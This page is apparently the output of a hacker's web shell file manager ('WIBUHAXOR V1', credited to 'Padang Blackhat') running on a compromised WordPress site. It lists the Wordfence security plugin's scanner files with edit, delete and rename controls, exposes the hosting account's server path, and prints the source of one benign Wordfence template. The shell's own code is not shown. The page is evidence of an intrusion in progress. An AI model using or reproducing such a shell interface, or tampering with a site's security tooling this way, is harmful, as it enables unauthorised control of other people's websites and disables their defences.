-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
rohihbs.com
/
wp-content
/
plugins
/
wordfence
/
views
/
scanner
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
issue-base.php
8.491KB
Edit File
Delete File
Rename
issue-checkGSB.php
2.409KB
Edit File
Delete File
Rename
issue-commentBadURL.php
3.094KB
Edit File
Delete File
Rename
issue-control-edit-comment.php
0.434KB
Edit File
Delete File
Rename
issue-control-edit-post.php
0.607KB
Edit File
Delete File
Rename
issue-control-hide-file.php
2.715KB
Edit File
Delete File
Rename
issue-control-ignore.php
2.134KB
Edit File
Delete File
Rename
issue-control-repair.php
0.895KB
Edit File
Delete File
Rename
issue-control-show-details.php
1.942KB
Edit File
Delete File
Rename
issue-coreUnknown.php
2KB
Edit File
Delete File
Rename
issue-database.php
2.116KB
Edit File
Delete File
Rename
issue-easyPassword.php
2.17KB
Edit File
Delete File
Rename
issue-knownfile.php
2.97KB
Edit File
Delete File
Rename
issue-postBadTitle.php
2.067KB
Edit File
Delete File
Rename
issue-postBadURL.php
3.187KB
Edit File
Delete File
Rename
issue-publiclyAccessible.php
2.017KB
Edit File
Delete File
Rename
issue-skippedPaths.php
1.696KB
Edit File
Delete File
Rename
issue-suspiciousAdminUsers.php
2.24KB
Edit File
Delete File
Rename
issue-wafStatus.php
1.938KB
Edit File
Delete File
Rename
issue-wfAssistantPresent.php
1.377KB
Edit File
Delete File
Rename
issue-wfPluginAbandoned.php
3.834KB
Edit File
Delete File
Rename
issue-wfPluginRemoved.php
3.074KB
Edit File
Delete File
Rename
issue-wfPluginUpgrade.php
3.993KB
Edit File
Delete File
Rename
issue-wfPluginVulnerable.php
3.019KB
Edit File
Delete File
Rename
issue-wfThemeUpgrade.php
3.58KB
Edit File
Delete File
Rename
issue-wfUpgrade.php
3.522KB
Edit File
Delete File
Rename
issue-wpscan_directoryList.php
2.221KB
Edit File
Delete File
Rename
issue-wpscan_fullPathDiscl.php
2.216KB
Edit File
Delete File
Rename
options-group-basic.php
1.38KB
Edit File
Delete File
Rename
options-group-general.php
7.866KB
Edit File
Delete File
Rename
options-group-scan-schedule.php
1.419KB
Edit File
Delete File
Rename
scan-progress-element.php
2.018KB
Edit File
Delete File
Rename
scan-progress.php
2.844KB
Edit File
Delete File
Rename
scan-scheduling.php
17.676KB
Edit File
Delete File
Rename
scan-type.php
9.115KB
Edit File
Delete File
Rename
scanner-status.php
3.983KB
Edit File
Delete File
Rename
site-cleaning-beta-sigs.php
8.587KB
Edit File
Delete File
Rename
site-cleaning-bottom.php
2.034KB
Edit File
Delete File
Rename
site-cleaning.php
9.117KB
Edit File
Delete File
Rename
<?php if (!defined('WORDFENCE_VERSION')) { exit; } /** * Presents an issue template. */ echo wfView::create('scanner/issue-base', array( 'internalType' => 'wfThemeUpgrade', 'displayType' => __('Theme Upgrade', 'wordfence'), 'iconSVG' => '<svg viewBox="0 0 20 20"><g><path d="M14.48 11.06L7.41 3.99l1.5-1.5c.5-.56 2.3-.47 3.51.32 1.21.8 1.43 1.28 2.91 2.1 1.18.64 2.45 1.26 4.45.85zm-.71.71L6.7 4.7 4.93 6.47c-.39.39-.39 1.02 0 1.41l1.06 1.06c.39.39.39 1.03 0 1.42-.6.6-1.43 1.11-2.21 1.69-.35.26-.7.53-1.01.84C1.43 14.23.4 16.08 1.4 17.07c.99 1 2.84-.03 4.18-1.36.31-.31.58-.66.85-1.02.57-.78 1.08-1.61 1.69-2.21.39-.39 1.02-.39 1.41 0l1.06 1.06c.39.39 1.02.39 1.41 0z"/></g></svg>', 'summaryControls' => array(wfView::create('scanner/issue-control-ignore', array('ignoreC' => __('Ignore ', 'wordfence'))), wfView::create('scanner/issue-control-show-details')), 'detailPairs' => array( __('Theme Name', 'wordfence') => '${data.name}', __('Current Theme Version', 'wordfence') => '${data.version}', __('New Theme Version', 'wordfence') => '${data.newVersion}', null, __('Details', 'wordfence') => '{{if data.vulnerable}}<strong>' . esc_html__('Update includes security-related fixes.', 'wordfence') . '</strong><br>{{/if}}{{html longMsg}}<br><a href="' . get_admin_url() . 'update-core.php' . '">' . esc_html__('Click here to update now', 'wordfence') . '</a>.', null, __('Theme URL', 'wordfence') => '<a href="${data.URL}" target="_blank" rel="noopener noreferrer"><span class="wf-hidden-xs wf-split-word">${data.URL}</span><span class="wf-visible-xs">' . __('View', 'wordfence') . '</span><span class="screen-reader-text"> (' . esc_html__('opens in new tab', 'wordfence') . ')</span></a>', __('Vulnerability Information', 'wordfence') => array('data.vulnerabilityLink', '<a href="${data.vulnerabilityLink}" target="_blank" rel="noopener noreferrer"><span class="wf-hidden-xs wf-split-word">${data.vulnerabilityLink}</span><span class="wf-visible-xs">' . __('View', 'wordfence') . '</span><span class="screen-reader-text"> (' . esc_html__('opens in new tab', 'wordfence') . ')</span></a>'), __('Vulnerability Severity', 'wordfence') => array('data.cvssScore', '${data.cvssScore}/10.0 (<span class="${data.severityClass}" data-tooltip="test" title="This is the severity of the vulnerability itself, which can differ from the scan result severity. Some lower-severity vulnerabilities may still be important to address depending on your site\'s configuration and user base, so they are still important for you to review.">${data.severityLabel}</span>)'), ), 'detailControls' => array( '<a href="#" class="wf-btn wf-btn-default wf-btn-callout-subtle wf-issue-control-mark-fixed" role="button">' . __('Mark as Fixed', 'wordfence') . '</a>', '<a href="' . esc_url(wfUtils::wpAdminURL('update-core.php')) . '" class="wf-btn wf-btn-default wf-btn-callout-subtle wf-issue-control-view-updates">' . __('View Updates', 'wordfence') . '</a>', ), 'textOutput' => (isset($textOutput) ? $textOutput : null), 'textOutputDetailPairs' => array( __('Theme Name', 'wordfence') => '$data.name', __('Current Theme Version', 'wordfence') => '$data.version', __('New Theme Version', 'wordfence') => '$data.newVersion', null, __('Details', 'wordfence') => '$longMsg', __('Vulnerability Status', 'wordfence') => array('$data.vulnerable', __('Update includes security-related fixes.', 'wordfence')), null, __('Theme URL', 'wordfence') => '$data.URL', __('Vulnerability Information', 'wordfence') => '$data.vulnerabilityLink', __('Vulnerability Severity', 'wordfence') => '${data.cvssScore}/10.0 (${data.severityLabel})', ), ))->render();
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat